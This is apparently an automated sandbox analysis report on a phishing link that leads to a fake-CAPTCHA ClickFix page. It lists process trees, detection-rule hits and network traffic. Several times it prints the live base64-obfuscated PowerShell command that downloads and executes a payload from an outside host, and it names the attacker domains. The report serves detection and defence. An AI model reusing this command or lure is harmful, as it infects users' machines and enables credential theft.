Windows Analysis Report
https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w

Overview

General Information

Sample URL: https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w
Analysis ID: 1700849
Infos:

Detection

CAPTCHA Scam ClickFix, ReflectiveLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Decrypt And Execute Base64 Data
Yara detected CAPTCHA Scam ClickFix
Yara detected ReflectiveLoader
AI detected suspicious URL
HTML page adds suspicious text to clipboard
Installs a global event hook (focus changed)
Installs a global keyboard hook
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected suspicious crossdomain redirect
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses a Windows Living Off The Land Binaries (LOL bins)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,18405873602495973812,11393449269972753126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 1420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 456 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AtBroker.exe (PID: 7380 cmdline: atbroker.exe /start narrator /hardwarebuttonlaunch MD5: 30076E434A015BDF4C136E09351882CC)
    • AtBroker.exe (PID: 7420 cmdline: C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch MD5: 30076E434A015BDF4C136E09351882CC)
      • Narrator.exe (PID: 7440 cmdline: "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch MD5: D92DEFAA4D346278480D2780325D8D18)
      • Narrator.exe (PID: 5664 cmdline: "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch MD5: D92DEFAA4D346278480D2780325D8D18)
  • powershell.exe (PID: 636 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 40279737-1c0a-47e7-b4ac-3a849a46e40d.exe (PID: 3788 cmdline: "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" 0xaa79fbd8 MD5: 286803E09EA7F8FFECA53A4F6A882EFA)
      • winver.exe (PID: 7220 cmdline: C:\Windows\System32\winver.exe MD5: 63DC2D604B8A96C9962494D1D957DD77)
      • ComputerDefaults.exe (PID: 5416 cmdline: C:\Windows\System32\ComputerDefaults.exe MD5: D25A9E160E3B74EF2242023726F15416)
        • 40279737-1c0a-47e7-b4ac-3a849a46e40d.exe (PID: 4256 cmdline: "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" MD5: 286803E09EA7F8FFECA53A4F6A882EFA)
          • WerFault.exe (PID: 6868 cmdline: C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • NarratorQuickStart.exe (PID: 3996 cmdline: "C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe" -ServerName:App.AppX2nbh7wcbt82z2dktjrtwk4f36gf9xxh2.mca MD5: 0F6BF15D33BD8E98FD906CF8BF3484DD)
  • cleanup
No reasoning has been found
No configs have been found
Source | Rule | Description | Author | Strings
00000014.00000002.2278146446.000001F58C8DF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ReflectiveLoader_1 | Yara detected ReflectiveLoader | Joe Security |
00000014.00000002.2277861314.000001F58BFD0000.00000004.08000000.00040000.00000007.sdmp | JoeSecurity_ReflectiveLoader_1 | Yara detected ReflectiveLoader | Joe Security |
0000001D.00000002.2269970604.0000000002F80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000014.00000002.2278146446.000001F58DBEE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ReflectiveLoader_1 | Yara detected ReflectiveLoader | Joe Security |

Source | Rule | Description | Author | Strings
3.5.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
3.4.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 456, ProcessName: svchost.exe

              Data Obfuscation

              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045', ProcessId: 636, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-05-28T17:11:26.554884+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.17 | 49760 | 172.67.218.142 | 443 | TCP
2025-05-28T17:11:26.066347+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.17 | 49760 | 172.67.218.142 | 443 | TCP
2025-05-28T17:11:26.067692+0200 | 1810003 | 2 | Potentially Bad Traffic | 172.67.218.142 | 443 | 192.168.2.17 | 49760 | TCP
2025-05-28T17:11:26.557533+0200 | 1810003 | 2 | Potentially Bad Traffic | 172.67.218.142 | 443 | 192.168.2.17 | 49760 | TCP
2025-05-28T17:11:24.982239+0200 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.17 | 49760 | 172.67.218.142 | 443 | TCP


              AV Detection

Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe, ReversingLabs: Detection: 58%

              Phishing

Source: Yara match, File source: 3.5.pages.csv, type: HTML
Source: Yara match, File source: 3.4.pages.csv, type: HTML
Source: https://google.com@vstrrrlineproperrms.world, Joe Sandbox AI: The URL uses 'google.com' as part of the userinfo section before the '@' symbol, which is a common technique to mislead users into thinking they are visiting a legitimate Google site. The actual domain is 'vstrrrlineproperrms.world', which does not have any clear association with Google. The use of multiple 'r' characters in 'vstrrrlineproperrms' suggests an attempt to create a visually confusing or complex domain name, potentially to obscure its true nature. The '.world' TLD does not inherently suggest a connection to Google, and the overall structure of the URL is likely to confuse users. The similarity score is high due to the presence of 'google.com' in the userinfo section, and the spoofed score is high due to the deceptive structure and potential for user confusion.
Source: https://google.com@vstrrrlineproperrms.world/, HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
Source: https://google.com@vstrrrlineproperrms.world/, HTTP Parser: No favicon
Source: unknown, HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49752 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49753 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49754 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.17:49755 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.123.129.254:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.218.142:443 -> 192.168.2.17:49760 version: TLS 1.2
Source: chrome.exe, Memory has grown: Private usage: 6MB later: 36MB
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, HTTP traffic: Redirect from: gtoyorupaz.activehosted.com to https://google.com@vstrrrlineproperrms.world
              Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: gz
Source: global traffic, HTTP traffic detected: GET /apic/Qkqxz/EJDGUe HTTP/1.1 Host: apioeks.icu
Source: Network traffic, Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49760 -> 172.67.218.142:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.17:49760 -> 172.67.218.142:443
Source: Network traffic, Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 172.67.218.142:443 -> 192.168.2.17:49760
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:49760 -> 172.67.218.142:443
              Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.emlnk9.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.activehosted.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1host: vstrrrlineproperrms.worldupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.activehosted.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: PHPSESSID=f8ae5b2a52937a4c6818136f9a2e3242cookie: cmp69590582=a312c8b61d00f1f22cb42b63f73c4b5bcookie: __cf_bm=N0zI4h9w5tj.8SUV16EVpu43G44J9Pnjedf_jHmZrHU-1748445004-1.0.1.1-WROsn2BWZZbNLf.I9Z8KFFQ.SWcmg5Jq9lvL2LETKs35L4zoKLl0V1F48STw1FnnHdDq.SaRXZhsG4rCm.l8QqwLR94aRPyMUOj.qIT3MHUpriority: u=0, i
              Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1host: code.jquery.comorigin: https://vstrrrlineproperrms.worldsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
              Source: global trafficHTTP traffic detected: GET /themes/custom/booking/images/favicons/site.webmanifest HTTP/1.1host: partner.booking.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://vstrrrlineproperrms.worldsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: manifestreferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
              Source: global trafficHTTP traffic detected: GET /static/favicon.svg HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/sign-in?op_token=TfJdHmLBtgyxynNyAVQfoJA5CI6hyqzkoKUihdfmGSMECOhmRPG7L5ISpinTV2lUg6pqPRSZOtIubLLBVAYQb47bO6BoYssoHdiMBVPi0JRThIGTbjdor5Dq5V0IaJC3XFZn2VYlhEyhQeqDnssydNaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: cf_clearance=ImTEX.W8TkinWI1ot9M0e2YukqaAe5R1vtOsQzPaCHM-1748445018-1.2.1.1-JQCCFZgfgo04ZTq3X0l2JPW1uJM0CHcLyuF35DH6.JHw4wFfDgFHoKooNse_l0eFQhr5Fsqedn7phkW7NGUqnZzf5nKDO9DknQL2LfogCS5xN5CTDo6BoZcxQRASW6qrChnycsM2evF5rOXD3GdrIu5urfl36XlUngWQ_TGXv3c9FsSzhLPWRgfXvE1p26YNm_s57ub0hIMEw4o7bfkfZQ0hDVlDffNBbl8YmTO.SQy4Aa0Geg4g6SE17ZgDjU9aFpG8yInCHrmV3NPChG8yc33AjCk5bXEGkN_KhFMzKYt2yLoKsr5HVJdGz2a3OklmwJtoPuMMi.jmkIir2MDzKL.zc
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
